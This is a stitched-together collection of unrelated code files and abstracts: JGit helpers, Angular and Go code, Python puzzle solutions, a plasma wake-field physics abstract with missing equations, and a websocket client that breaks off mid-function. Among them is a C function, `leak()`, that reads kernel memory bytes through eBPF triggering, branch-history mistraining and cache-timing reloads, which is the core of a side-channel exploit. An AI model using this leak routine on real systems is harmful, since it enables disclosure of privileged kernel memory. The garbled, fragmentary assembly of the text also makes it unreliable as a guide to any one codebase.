有兴趣的可以看下jgitAPI研究一下 欢迎留言 addCommand.addFilepattern(".").call(); RmCommand rm=git.rm(); Status status=git.status().call(); //循环add missing 的文件 没研究出missing和remove的区别 就是删除的文件也要提交到git Set<String> missing=status.getMissing(); for(String m : missing){ // logger.info("missing files: "+m); rm.addFilepattern(m).call(); //每次需重新获取rm status 不然会报错 rm=git.rm(); status=git.status().call(); } //循环add remove 的文件 Set<String> removed=status.getRemoved(); for(String r : removed){ // logger.info("removed files: "+r); rm.addFilepattern(r).call(); rm=git.rm(); status=git.status().call(); } //提交 git.commit().setMessage("commit").call(); //推送 git.push().setCredentialsProvider(new UsernamePasswordCredentialsProvider(USER, PASSWORD)).call(); return true; } catch (Exception e) { e.printStackTrace(); return false; } } /** * @author zhang.heng * @date 2020-04-07 18:00 * @Param: [localPath, remoteRepoUri, userName, userPassword] * @return java.lang.String * @throws * @taskId */ public static String setupRepo(String localPath, String remoteRepoUri, String userName,String userPassword) { String msg = ""; try { Git git = Git.cloneRepository() .setURI(remoteRepoUri) .setCredentialsProvider(new UsernamePasswordCredentialsProvider(userName, userPassword)) .setBranch("master") .setDirectory(new File(localPath)).call(); msg = "git init success!"; } catch (Exception e) { msg = "git已经初始化!"; } return msg; } //pull拉取远程仓库文件 public static boolean pullBranchToLocal(String localGitFile, String userName,String userPassword){ boolean resultFlag = false; //git仓库地址 Git git; try { git = new Git(new FileRepository(localGitFile)); git.pull().setRemoteBranchName("master") .setCredentialsProvider(new UsernamePasswordCredentialsProvider(userName,userPassword)).call(); resultFlag = true; } catch (IOException | GitAPIException e) { e.printStackTrace(); } return resultFlag; } //提交git public static boolean commitFiles(String localGitFile, String userName,String userPassword) { Git git = null; try { git = Git.open(new File(localGitFile)); AddCommand addCommand = git.add(); //add操作 add -A操作在jgit不知道怎么用 没有尝试出来 有兴趣的可以看下jgitAPI研究一下 欢迎留言 addCommand.addFilepattern(".").call(); RmCommand rm=git.rm(); Status status=git.status().call(); //循环add missing 的文件 没研究出missing和remove的区别 就是删除的文件也要提交到git Set<String> missing=status.getMissing(); for(String m : missing){ // logger.info("missing files: "+m); rm.addFilepattern(m).call(); //每次需重新获取rm status 不然会报错 rm=git.rm(); status=git.status().call(); } //循环add remove 的文件 Set<String> removed=status.getRemoved(); for(String r : removed){ // logger.info("removed files: "+r); rm.addFilepattern(r).call(); rm=git.rm(); status=git.status().call(); } //提交 git.commit().setMessage("commit").call(); //推送 git.push().setCredentialsProvider(new UsernamePasswordCredentialsProvider(userName, userPassword)).call(); return true; } catch (Exception e) { e.printStackTrace(); return false; } } }
<reponame>tatem-games/verdaccio-google-oauth-ui<filename>src/redirect.ts<gh_stars>0 import { authorizePath, callbackPath } from './constants'; export function getAuthorizePath(id?: string) { return authorizePath + '/' + (id || ':id?'); } export function getCallbackPath(id?: string) { return callbackPath + (id ? '/' + id : ''); }
import { Component, AfterContentInit } from '@angular/core'; import { ActivatedRoute } from '@angular/router'; import blog from '../../../../data/blog/blog.json'; import blogcategory from '../../../../data/blog/category.json' import blogtags from '../../../../data/blog/tags.json' import author from '../../../../data/speaker.json'; @Component({ selector: 'app-content', templateUrl: './content.component.html', styleUrls: ['./content.component.css'] }) export class ContentComponent implements AfterContentInit { // pagination page: number = 1; constructor(private router: ActivatedRoute) { } public blogpost = blog; public author = author; public blogtags = blogtags; public blogcategory = blogcategory; public getAuthor(items: string | any[]) { var elems = author.filter((item: { id: string; }) => { return items.includes(item.id) }); return elems; } // Category Filter public setCategory(id: any) { this.blogcategory = id; } public getCategory() { return this.blogcategory; } public getPostsByCategory(catId: string) { return this.blogpost = blog.filter((item: { category: number[]; }) => { return item.category.includes(parseInt(catId)) }); } // Tag Filter public setTag(id: any) { this.blogtags = id; } public getTag() { return this.blogtags; } public getPostsByTags(tagId: string) { return this.blogpost = blog.filter((item: { tags: number[]; }) => { return item.tags.includes(parseInt(tagId)) }); } // Author Filter public setAuthor(id: any) { this.author = id; } public getAuthorPost() { return this.author; } public getPostsByAuthors(authorId: string) { return this.blogpost = blog.filter((item: { author: number[]; }) => { return item.author.includes(parseInt(authorId)) }); } // Fetch All filter public setPosts() { var postsByCategory = this.getCategory() != undefined ? this.getPostsByCategory(this.getCategory()) : '', postsByTags = this.getTag() != undefined ? this.getPostsByTags(this.getTag()) : '', postsByAuthor = this.getAuthorPost() != undefined ? this.getPostsByAuthors(this.getAuthorPost()) : ''; if ((postsByCategory != '' || postsByCategory != undefined || postsByCategory != null) && postsByCategory.length > 0) { this.blogpost = postsByCategory; } else if ((postsByTags != '' || postsByTags != undefined || postsByTags != null) && postsByTags.length > 0) { this.blogpost = postsByTags; } else if ((postsByAuthor != '' || postsByAuthor != undefined || postsByAuthor != null) && postsByAuthor.length > 0) { this.blogpost = postsByAuthor; } } ngAfterContentInit(): void { this.setCategory(this.router.snapshot.params.catId); this.setTag(this.router.snapshot.params.tagId); this.setAuthor(this.router.snapshot.params.authorId); this.setPosts(); } }
def get_input(): while True: try: yield ''.join(input()) except EOFError: break ans1 = [0 for i in range(4001)] ans2 = [0 for i in range(4001)] ans3 = [0 for i in range(4001)] ans4 = [0 for i in range(4001)] for i in range(1001): ans1[i] = 1 for i in range(1001,4001): ans1[i] = 0 for i in range(4001): for j in range(1001): ans2[i] += ans1[i-j] for i in range(4001): for j in range(1001): ans3[i] += ans2[i-j] for i in range(4001): for j in range(1001): ans4[i] += ans3[i-j] #print("DONE") N = list(get_input()) for l in range(len(N)): print(ans4[int(N[l])])
/** * Group of tests for EnsemblGenomes compara databases * * @author dstaines * */ public class EGCompara extends GroupOfTests { public EGCompara() { setDescription("Group of tests for EnsemblGenomes compara databases."); addTest( EGCommon.class, EGComparaGeneTree.class, EGCheckSynteny.class, EGForeignKeyMethodLinkSpeciesSetId.class, EGCheckNoTreeStableIds.class, ForeignKeyDnafragId.class, ForeignKeyGenomeDbId.class, ForeignKeyGenomicAlignBlockId.class, ForeignKeyGenomicAlignId.class, ForeignKeyMethodLinkId.class, ForeignKeyTaxonId.class, EGCheckEmptyLocators.class, MemberXrefAssociation.class, MemberProductionCounts.class, MultipleGenomicAlignBlockIds.class, ControlledComparaTables.class ); } }
package makeless_go_model import "sync" type EmailVerification struct { Model Token *string `gorm:"unique;not null" json:"-"` Verified *bool `gorm:"not null" json:"verified"` UserId *uint `gorm:"not null" json:"userId"` User *User `json:"user"` *sync.RWMutex } func (emailVerification *EmailVerification) GetId() uint { emailVerification.RLock() defer emailVerification.RUnlock() return emailVerification.Id } func (emailVerification *EmailVerification) GetToken() *string { emailVerification.RLock() defer emailVerification.RUnlock() return emailVerification.Token } func (emailVerification *EmailVerification) GetVerified() *bool { emailVerification.RLock() defer emailVerification.RUnlock() return emailVerification.Verified } func (emailVerification *EmailVerification) GetUser() *User { emailVerification.RLock() defer emailVerification.RUnlock() return emailVerification.User }
import sys input = sys.stdin.readline def gcd(a, b): if a == 0: return b return gcd(b % a, a) def lcm(a, b): return (a * b) / gcd(a, b) def isprime(n): for i in range(2,int(n**0.5)+1): if n%i==0: return 0 return 1 def main(): n = int(input()) s=input() d={} d['a']=d['e']=d['i']=d['o']=d['u']=d['y']=0 i=0 while(i<n): if s[i] in d.keys(): c=1 while(i+1<n and s[i]==s[i+1]): i+=1 c+=1 #print(c) if s[i]=='e' or s[i]=='o': if c>2: print(s[i],end='') else: print(s[i]*c,end='') else: print(s[i],end='') else: print(s[i],end='') i+=1 if __name__ == "__main__": main()
//Leak byte at provided kernel addr, return 0 if addr not mapped //if provided, it also return the number of hits to check the //leak confidence level int leak(uint64_t addr, int *n_hits) { int hits; uint8_t byte = 0; *n_hits = 0; for(int bit_pos=0; bit_pos<8; bit_pos++) { hits=0; for(int j=0; j<ITER; j++) { if(evict_syscall) { evict(&ev_set_sys); } evict_fr_buf(); trigger_ebpf(sock_gadget_leak, 0); fill_bhb(history, SYSCALL_MISTRAIN, bit_pos, 0, 0, addr-0x14ULL); trigger_ebpf(sock_reload, 0); if(map_get(map_array_fd_time, 1) < thr_fr_buf) hits++; } if (hits > ITER/2) byte |= (1<<bit_pos); *n_hits += hits; } return byte; }
// WithTemplates overrides the default templates (entgql.AllTemplates) // with specific templates. func WithTemplates(templates ...*gen.Template) ExtensionOption { return func(ex *Extension) error { ex.templates = templates return nil } }
def show_ui_component(builder, component: str, show: bool): component = builder.get_object(component) if show: component.show() else: component.hide()
// LoadCSV loads a csv file for mocked database testing. Like // github.com/DATA-DOG/go-sqlmock does. // CSV file should be comma separated. func LoadCSV(opts ...csvOptions) (columns []string, rows [][]driver.Value, err error) { cfg := new(config) for _, opt := range opts { opt(cfg) } f, err := os.Open(cfg.path) if err != nil { err = errors.Wrap(err, "[cstesting] os.Open") return } csvReader := csv.NewReader(f) if cfg.cc != nil { if cfg.cc.Comma > 0 { csvReader.Comma = cfg.cc.Comma } if cfg.cc.Comment > 0 { csvReader.Comment = cfg.cc.Comment } if cfg.cc.FieldsPerRecord > 0 { csvReader.FieldsPerRecord = cfg.cc.FieldsPerRecord } if cfg.cc.LazyQuotes != nil { csvReader.LazyQuotes = *cfg.cc.LazyQuotes } if cfg.cc.TrimLeadingSpace != nil { csvReader.TrimLeadingSpace = *cfg.cc.TrimLeadingSpace } } j := 0 for { var res []string res, err = csvReader.Read() switch { case err == io.EOF: err = nil return case err != nil: err = errors.Wrap(err, "[cstesting] csvReader.Read") return case res == nil: err = errors.Fatal.Newf("[cstesting] Cannot read from csv %q", cfg.path) return } if j == 0 { columns = make([]string, len(res)) } row := make([]driver.Value, len(res)) for i, v := range res { v = strings.TrimSpace(v) if j == 0 { columns[i] = v } else { b := parseCol(cfg, v) row[i] = b } } if j > 0 { rows = append(rows, row) } j++ } }
Three-dimensional wake fields, generated in plasma by cylindrical electron bunch The expressions for wake fields, generated in plasma (in the plasma waveguide or unlimited plasma) by relativistic electron bunch, was received and analyzed for the cases of the presence and absence of strong external longitudinal magnetic field. For the both cases the comparative analysis of the dependence of field amplitudes on the parameters of the electron bunch was done. Presently the studies on new methods of charged particle acceleration by means of wake fields, generated in plasma by laser radiation (BWA (Beat-Wave Acceleration), LWFA (Laser Wake Field Acceleration)) and by bunches of relativistic particles (PWFA (Plasma Wake-Field Acceleration)), moving in plasma are intensively developed (see, e.g. reviews and cited there literature). The intensity of acceleration fields (in the order of 10 7 − 10 8 V /cm), attained by these methods can be used both for the charge acceleration, and for focusing of electron (positron) bunches in order to obtain the beams of high density and to ensure high luminosity in linear colliders of next generation . Linear theory of wake field generating by two-and three-dimensional rigid bunches of charged particles in boundless and limited plasma was developed in many works . Nonlinear theory of wake field generating by a rigid one-dimensional bunch of final extent and sequence of charge particle bunch was developed in . It was shown that optimum condition for wave generating is n b = n 0 /2 (n b , n 0 are the density values of bunch and plasma electrons, correspondingly). Important result of this theory is the demonstration that, in the case of nonlinear wake fields a transformation ratio R = E ac /E st (E ac and E st are the extension of correspondingly accelerating and decelerating electric fields) depends on gamma-factor of accelerating bunch and may be significant without special bunch shaping, as it occurs in the case of linear wake fields generated by a rigid bunch. The conclusion of the results mentioned above is reaffirmed in for the assumption where v 0 is the bunch velocity), that brings to the incorrect expression for the maximum value of accelerating field E ac (when n b /n 0 = 1/2 E ac = ∞). The influence of transverse sizes of the bunch on non-linear wake field generated by short bunches (d ≪ λ p , d is the bunch length, λ p is the wave length) was considered in . Non-linear theory of wake field generated by two-and three-dimensional bunches for the general case is not yet developed. This work contains the results and analysis of linear equation solution, describing the interaction of the axial symmetrical homogenous bunch of charged particles with plasma in the assumption of the plasma vorticity absence (laminar flow), as well as at the strong external constant magnetic field applied along the bunch motion, when the transverse movements of plasma electrons are suppressed. Basic equations Vector equation, describing the excitation of nonlinear three-dimensional wake fields by the rigid bunch of charged particles with electron density n b moving with constant velocity v 0 along the z axis through the cold plasma at equilibrium with density n 0 in hydrodynamic description and in the assumption of absence of the plasma vorticity is given by the following formula ∇∇ − ∇ 2 + 1 c 2 where ρ = p/mc is dimensionless momentum of plasma electrons, A-vector potential of electromagnetic field, k p = ω p /v 0 , ω p = 4πn 0 e 2 /m-is the plasma frequency of electrons, β 0 = v 0 /c, and n b -arbitrary function of coordinates and time. The similar equation, describing interaction between laser pulse and the plasma, was obtained in . Let as consider axial-symmetrical bunch, when ρ depends only on variable r and z = z − v 0 t (steady state). In this case vector ρ has only longitudinal ρ z and radial ρ r components, which do not depend on azimuthal angle ϕ, and ρ ϕ = 0. The system of equations for the component of momentum ρ z and ρ r has the following form: Inserting in (3) and (4) ρ r = 0 and ρ z = ρ z ( z) (dependence on r is absent) we come to the onedimensional nonlinear equation, considered in Inserting in (4) ρ r = 0 and expressing the derivative ∂ρ z /∂ z through derivatives of ρ z we receive for scalar potential ϕ the following equation, describing interaction of electron bunch with plasma in the presence of the external magnetic field B 0 (0, 0, B 0 ) : where 3 Wakefield generating at vorticity absence Let us consider the problem of wake field generating by rigid cylindrical bunch of radius a and horizontal dimension d with homogeneous distribution of electrons of the bunch moving in conducting plasma waveguide of radius b ≥ a. Assuming in (3) and (4) n b /n 0 ≪ 1 (linear approximation) and linearizing the system on ρ we shall obtain the following system of equations, describing the process under consideration: To define ρ z (r, z) and ρ r (r, z) let us perform the Hankel transformation of the equations system (9) on r in the finite limits (0, b) and solving the obtained equations on z in the assumption of the continuity conditions of the momentum components ρ z , ρ r and components of the electrical field E z = mcv0 at the front ( z = d) and rear ( z = 0) bunch boundaries we shall receive the following expression for the field components E z and E r : in the corresponding areas on r. Before the bunch (0 ≤ r ≤ a ≤ b, d ≤ z ≤ ∞) we have the following expression for the field components: After the bunch (−∞ ≤ z ≤ 0) we have ×(k p a) The components different from zero B ϕ of E-wave (E z , E r , B ϕ ) magnetic field is determining by the formula B ϕ = mc 2 e ∂ρ r ∂ z − ∂ρ z ∂r (22) and is described by the following expressions In formulas (10)-(25) J 0 , J 1 are the Bessel functions, and I 0 , I 1 , K 0 , K 1 -are the modified Bessel functions, κ 2 = k 2 p β 2 0 + µ 2 n /b 2 . As it may be seen from the given expressions for field components E z , E r they consist of periodic (wake field) and non-periodic ("Coulomb") parts. Before the bunch the field has only non-periodic part, which exponentially falls of with the remote from the front boundary, so that part may be neglected. After the bunch the "Coulomb" part also falls off exponentially with the remote from the rear boundary z = 0 and only periodic wake field remains. Magnetic field component B ϕ has only non-periodic "Coulomb" part, which exponentially also decreases at the remote from the bunch boundaries and it can be ignored. In the range of 0 ≤ z ≤ d, where magnetic field is not small, the radial force f r = −eE r + eβ 0 B ϕ acting on the bunch electrons, and this force in some ranges on z can compress the bunch, focusing it. Before the bunch ( z ≥ d) and in the range of wake field ( z ≤ 0) the component of the magnetic field B ϕ is small and the radial force is f r ≈ −eE r . Below one can find an expression for the radial force f r acting on the bunch (0 ≤ z ≤ d) at β 0 ≈ 1, where O(γ −2 0 ) is the smaller defocusing part of the force. Let us also give an expressions for the fields E z and E r inside and after the bunch in the case when a = b and in the case when b → ∞ (unlimited plasma): and E IV zH , E IV rH → 0 at z < 0. At the a → ∞ I 0 (k p a) → ∞ and the expressions for E I z and E IV z coincide with the expressions for one-dimensional bunch, while E I r and E IV r → 0. At k p a ≪ 1 (k p r < k p a ≪ 1) periodic parts of the fields E I,IV z and E I,IV r are proportional to (k p a) 2 and k p r. Non-periodic parts are small at γ 0 ≫ 1. The expressions for E z and E r inside the bunch and in the wake field at b → ∞, γ 0 ≫ 1 go over into corresponding expressions for the case with unlimited plasma. In this case at k p r ≪ 1, k p a ≪ 1 (r > a or r < a) the longitudinal fields inside and over the bunch as well as in the wake are proportional to (k p a) 2 , while the radial components of the fields E I,IV r ∼ r/2a at r < a and E I,IV r ∼ a/2r at r > a, e.g. they increase with the remote from the bunch centre inside the bunch and decrease with the remote from the bunch boundaries inside it. Let us define the plasma density for the mentioned four regions. From the Poisson equation it follows that n e = − 1 4πe In the regions outside the bunch in (29) we should suppose n b = 0. Using the expressions (10)-(21) for the fields we shall find out the following expressions for the plasma densities: Thus, the density n e depends periodically on z inside and after the electron bunch at r ≤ a and does not depend on r and sizes a and b. Wake field excitation under strong external magnetic field The linear equation for the potential ϕ, describing the interaction of cylindrical electron bunch of radius a and length d with unlimited cold plasma, follows from expressions (6), (7) in assumption eϕ/mc 2 ≪ 1, n b /n 0 ≪ 1 and has the following form: where n b is given by the expression (8). Before the bunch ( z ≥ d), where n b = 0, h = 0 the potential ϕ(r, z) is assumed as equal to zero (we ignore the "Coulomb" field, see chapter 3). Solving the equation under assumption of continuity of the potential ϕ(α, z) on the front ( z = d) and rear ( z = 0) boundaries of the bunch, we shall come to the following expressions for ϕ(r, z) in the ranges inside and over the bunch (0 ≤ z ≤ d, 0 ≤ r ≤ a, a ≤ r < ∞) where k has the positive imaginary part Imk = k After the bunch ( z ≤ 0, 0 ≤ r < ∞) the potential ϕ has the following form: Because the "Coulomb" components (α 2 > k 2 ) are small one can ignore them and bring out the expression of square brackets from the integral in the point α = 0, where it makes the main input into the integral. In this case the expressions (35), (36) significantly simplify: The components of the fields are determined from the expressions: Inside the bunch (0 ≤ r ≤ a, 0 ≤ z ≤ d) we have: and on the other hand, there is more distinctly expressed dependence on γ-factor of the bunch. Besides, magnetic wake field B ϕ is equal to zero in plasma without the field and defers from zero in the case of plasma with B 0 = 0.
Mobilizing Education to Nurses at the Bedside. After a survey revealed practice gaps in central venous catheter care, one organization was challenged to identify a novel approach to educate nurses. Through a search for evidence, a project workgroup discovered an existing but beneficial teaching method, using a mobile cart to deliver meaningful education at the point of care. Successful outcomes and sustained practice change were realized.
from django.contrib import admin from .models import * admin.site.register(Usuario) admin.site.register(Turma) admin.site.register(Aula) admin.site.register(Exercicio) admin.site.register(Experimentacao) admin.site.register(Pergunta) #admin.site.register(Tema) admin.site.register(Usuario_Pergunta) admin.site.register(Aluno_Exercicio) admin.site.register(Aluno_Aula) admin.site.register(Aluno_Turma) admin.site.register(Forum) admin.site.register(Resposta) admin.site.register(Teste) #admin.site.register(Tema_Turma) admin.site.register(Document)
def save(self) -> None: tmp_list = self.listbox_num.get(0, END) file = open('num_list.csv', 'w') for tmp in tmp_list: file.write(tmp + '\n') file.close()
<filename>generate.py from keras.models import Sequential from keras.layers import Dense, Activation from keras.layers import LSTM import numpy as np import random import sys import os import io import argparse parser = argparse.ArgumentParser() parser.add_argument('weights', help='''Path to the weights that were either pretrained or generated with train.py.''') parser.add_argument('-data', default='training_data.txt', help='''Dataset to use for generating words. Should be same as one used for training. Default: "training_data.txt"''') parser.add_argument('-randomness', type=float, default=0.05, help='''The exponential factor determining the predicted character to be chosen. Do not change unless you know what you're doing. Default: 0.05''') parser.add_argument('-length', type=int, default=500, help='''Length of text to generate. Default: 500''') parser.add_argument('-out_file', default='output.txt', help='''Generated output. Default: "output.txt"''') parser.add_argument('-seed', default='', help='''Seed to use to generate the text. Default: Chooses random text from the dataset.''') args = vars(parser.parse_args()) if not os.path.isfile(args['weights']): print("Weights file not found!") path = args['data'] with io.open(path, encoding='utf-8') as f: text = f.read() chars = sorted(list(set(text))) char_indices = dict((c, i) for i, c in enumerate(chars)) indices_char = dict((i, c) for i, c in enumerate(chars)) # cut the text in semi-redundant sequences of maxlen characters maxlen = 40 step = 3 sentences = [] next_chars = [] for i in range(0, len(text) - maxlen, step): sentences.append(text[i: i + maxlen]) next_chars.append(text[i + maxlen]) print('Vectorization...') x = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool) y = np.zeros((len(sentences), len(chars)), dtype=np.bool) for i, sentence in enumerate(sentences): for t, char in enumerate(sentence): x[i, t, char_indices[char]] = 1 y[i, char_indices[next_chars[i]]] = 1 # build the model: 2 LSTM print('Build model...') model = Sequential() model.add(LSTM(128, input_shape=(maxlen, len(chars)), return_sequences=True)) model.add(LSTM(128)) model.add(Dense(len(chars))) model.add(Activation('softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop') model.load_weights(args['weights']) start_index = random.randint(0, len(text) - maxlen - 1) generated = '' sentence = args['seed'] if sentence == '' or len(sentence) != 40: sentence = text[start_index: start_index + maxlen - 20] generated += sentence print('\n----- Generating with seed: "' + sentence.replace("\n", "\\n") + '" -----\n\n') with open(args['out_file'], 'w') as f: sys.stdout.write(generated) f.write(generated) for i in range(args['length']): x_pred = np.zeros((1, maxlen, len(chars))) for t, char in enumerate(sentence): x_pred[0, t, char_indices[char]] = 1. preds = np.asarray(model.predict(x_pred, verbose=0)[0]).astype('float') preds = np.exp(np.log(preds*args['randomness'])) preds /= np.sum(preds) preds = np.random.multinomial(1, preds, 1) next_index = np.argmax(preds) next_char = indices_char[next_index] generated += next_char sentence = sentence[1:] + next_char sys.stdout.write(next_char) f.write(next_char) sys.stdout.flush() f.flush() f.write('\n') f.flush() print() print('----- DONE -----') print("Written output to:", args['out_file'])
def add_message(self, player, message): connection_id = player.connection_id if not connection_id in self.messages: self.messages[connection_id] = [] self.messages[connection_id].append(message)
class DemexWebsocket: """ DemexWebsocket is a high-level async implementation off the official Tradehub Demex websocket and provides all functionalities described in the documentation. """ def __init__(self, uri: str, ping_interval: Optional[int] = 10, ping_timeout: Optional[int] = 30): """ Create a websocket which is complaint with the specification provided by the offical documentation. .. see:: https://docs.switcheo.org/#/?id=websocket :param uri: Websocket URI, starting with 'ws://' or 'wss://' e.g. 'ws://85.214.81.155:5000/ws' :param ping_interval: Interval for pinging the server in seconds. :param ping_timeout: Time after no response for pings are considered as timeout in seconds. """ self._uri: str = uri self._ping_interval: int = ping_interval self._ping_timeout: int = ping_timeout self._websocket: Optional[websockets.WebSocketClientProtocol] = None async def subscribe(self, message_id: str, channels: List[str]): """ Subscribe to one or many channels. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param channels: List with channels to join. :return: None """ await self.send({ "id": message_id, "method": "subscribe", "params": {"channels": channels} }) async def unsubscribe(self, message_id: str, channels: List[str]): """ Unsubscribe to one or many channels. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param channels: List with channels to leave. :return: None """ await self.send({ "id": message_id, "method": "unsubscribe", "params": {"channels": channels} }) async def subscribe_leverages(self, message_id: str, swth_address: str): """ Subscribe to wallet specific leverages channel. .. warning:: This channel has not been tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :return: None """ # TODO not tested yet channel_name: str = f"leverages.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_market_stats(self, message_id: str): """ Subscribe to market stats. Example:: ws_client.subscribe_market_stats('market_stats') The initial channel message is expected as:: { 'id':'market_stats', 'result': ['market_stats'] } The subscription and channel messages are expected as follow:: { 'channel': 'market_stats', 'sequence_number': 484, 'result': { 'cel1_usdc1': { 'day_high': '5.97', 'day_low': '5.72', 'day_open': '5.86', 'day_close': '5.74', 'day_volume': '414.4', 'day_quote_volume': '2429.009', 'index_price': '0', 'mark_price': '0', 'last_price': '5.74', 'market': 'cel1_usdc1', 'market_type': 'spot', 'open_interest': '0' } ... } } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :return: None """ channel_name: str = "market_stats" await self.subscribe(message_id, [channel_name]) async def subscribe_books(self, message_id: str, market: str): """ Subscribe to book channel. Example:: ws_client.subscribe_books('orderbook', "swth_eth1') The initial channel message is expected as:: { 'id':'orderbook', 'result': ['books.eth1_usdc1', ...] } The initial subscription message is expected as:: { 'channel': 'books.eth1_usdc1', 'sequence_number': 924, 'result': [ { 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'side': 'sell', 'type': 'new' }, ... { 'market': 'eth1_usdc1', 'price': '1790.1', 'quantity': '0.02', 'side': 'buy', 'type': 'new' } ... ] } The channel update messages are expected as:: { 'channel': 'books.eth1_usdc1', 'sequence_number': 924, 'result': [ { 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0', 'side': 'sell', 'type': 'delete' }, ... { 'market':'eth1_usdc1', 'price': '1800.18', 'quantity': '-0.43', 'side': 'sell', 'type': 'update' }, ... { 'market': 'eth1_usdc1', 'price': '1114.48', 'quantity': '182.716', 'side': 'buy', 'type': 'new' } ] } .. note:: The initial message is a snapshot of the current orderbook. The following messages are delta messages to the snapshot. Each message has a 'sequence_number'. Updates can contain update types: 'new', 'update' or 'delete'. The quantity in a 'update' message can be negative indicating a reduction, while positive value means an increment. All updates need to be processed in the provided order to maintain an consistent orderbook. .. warning:: The initial snapshot is a partial orderbook with a total of 100 entries! Expect receiving updates for orders outside the local managed orderbook. Ignore or reconnect to maintain the local orderbook. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ channel_name: str = f"books.{market}" await self.subscribe(message_id, [channel_name]) async def subscribe_orders(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to orders channel. .. note:: The market identifier is optional and acts as a filter. Example:: ws_client.subscribe_orders('orders', "swth1...abcd') The initial channel message is expected as:: { 'id':'orders', 'result': ['orders.swth1...abcd'] } The channel update messages are expected as:: { 'channel': 'orders.swth1...abcd', 'result': [ { 'order_id': '7CBBF51B75CF2E046726BB...56757D6D502B01F4BB62178DCF', 'block_height': 7375724, 'triggered_block_height': 0, 'address': 'swth1...abcd', 'market': 'eth1_wbtc1', 'side': 'sell', 'price': '0', 'quantity': '0.08', 'available': '0.08', 'filled': '0', 'order_status': 'pending', 'order_type': 'market', 'initiator': 'user', 'time_in_force': 'fok', 'stop_price': '0', 'trigger_type': '', 'allocated_margin_denom': 'eth1', 'allocated_margin_amount': '0', 'is_liquidation': False, 'is_post_only': False, 'is_reduce_only': False, 'type': 'new', 'block_created_at': '2021-02-11T20:36:02.244175356Z', 'username': '', 'id': '' } ... ] } :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ if market: channel_name: str = f"orders_by_market.{market}.{swth_address}" else: channel_name: str = f"orders.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_positions(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to positions channel. .. note:: The market identifier is optional and acts as a filter. .. warning:: This channel is not tested yet. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ # TODO not tested yet if market: channel_name: str = f"positions_by_market.{market}.{swth_address}" else: channel_name: str = f"positions.{swth_address}" await self.subscribe(message_id, [channel_name]) async def subscribe_recent_trades(self, message_id: str, market: str): """ Subscribe to recent trades. Example:: ws_client.subscribe_recent_trades('trades', "swth_eth1') The initial channel message is expected as:: { 'id': 'trades', 'result': ['recent_trades.swth_eth1'] } The channel update messages are expected as:: { 'channel': 'recent_trades.eth1_usdc1', 'sequence_number': 812, 'result': [ { 'id': '0', 'block_created_at': '2021-02-11T20:49:07.095418551Z', 'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856', 'taker_address': 'swth1vaavrkrm7usqg9hcwhqh2hev9m3nryw7aera8p', 'taker_fee_amount': '0.00002', 'taker_fee_denom': 'eth1', 'taker_side': 'buy', 'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E', 'maker_address': 'swth1wmcj8gmz4tszy5v8c0d9lxnmguqcdkw22275w5', 'maker_fee_amount': '-0.00001', 'maker_fee_denom': 'eth1', 'maker_side': 'sell', 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'liquidation': '', 'taker_username': '', 'maker_username': '', 'block_height': '7376096' }, ... ] } .. warning:: The field 'id' is sometimes '0'. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ channel_name: str = f"recent_trades.{market}" await self.subscribe(message_id, [channel_name]) async def subscribe_account_trades(self, message_id: str, swth_address: str, market: Optional[str] = None): """ Subscribe to account trades. Example:: ws_client.subscribe_account_trades('account', 'swth...abcd', 'eth1_usdc1') # or for all markets ws_client.subscribe_account_trades('account', "swth...abcd') The initial channel message is expected as:: { 'id': 'account', 'result': ['account_trades_by_market.eth1_usdc1.swth1...abcd'] } # or for all markets { 'id': 'account', 'result': ['account_trades.swth1...abcd'] } The channel update messages are expected as:: { 'channel': 'recent_trades.eth1_usdc1', 'sequence_number': 812, 'result': [ { 'id': '0', 'block_created_at': '2021-02-11T20:49:07.095418551Z', 'taker_id': '5FF349410F9CF59BED36D412D1223424835342274BC0E504ED0A17EE4B5B0856', 'taker_address': 'swth1...taker', 'taker_fee_amount': '0.00002', 'taker_fee_denom': 'eth1', 'taker_side': 'buy', 'maker_id': '8334A9C97CAEFAF84774AAADB0D5666E7764BA023DF145C8AF90BB6A6862EA2E', 'maker_address': 'swth1...maker', 'maker_fee_amount': '-0.00001', 'maker_fee_denom': 'eth1', 'maker_side': 'sell', 'market': 'eth1_usdc1', 'price': '1797.1', 'quantity': '0.02', 'liquidation': '', 'taker_username': '', 'maker_username': '', 'block_height': '7376096' }, ... ] } .. note:: The market identifier is optional and acts as a filter. .. warning:: The field 'id' is '0' all the time. This endpoint/channel does not seem to work correct. :param message_id: Identifier that will be included in the websocket message response to allow the subscriber to identify which channel the notification is originated from. :param swth_address: Tradehub wallet address starting with 'swth1' for mainnet and 'tswth1' for testnet. :param market: Tradehub market identifier, e.g. 'swth_eth1' :return: None """ if market: channel_name: str = 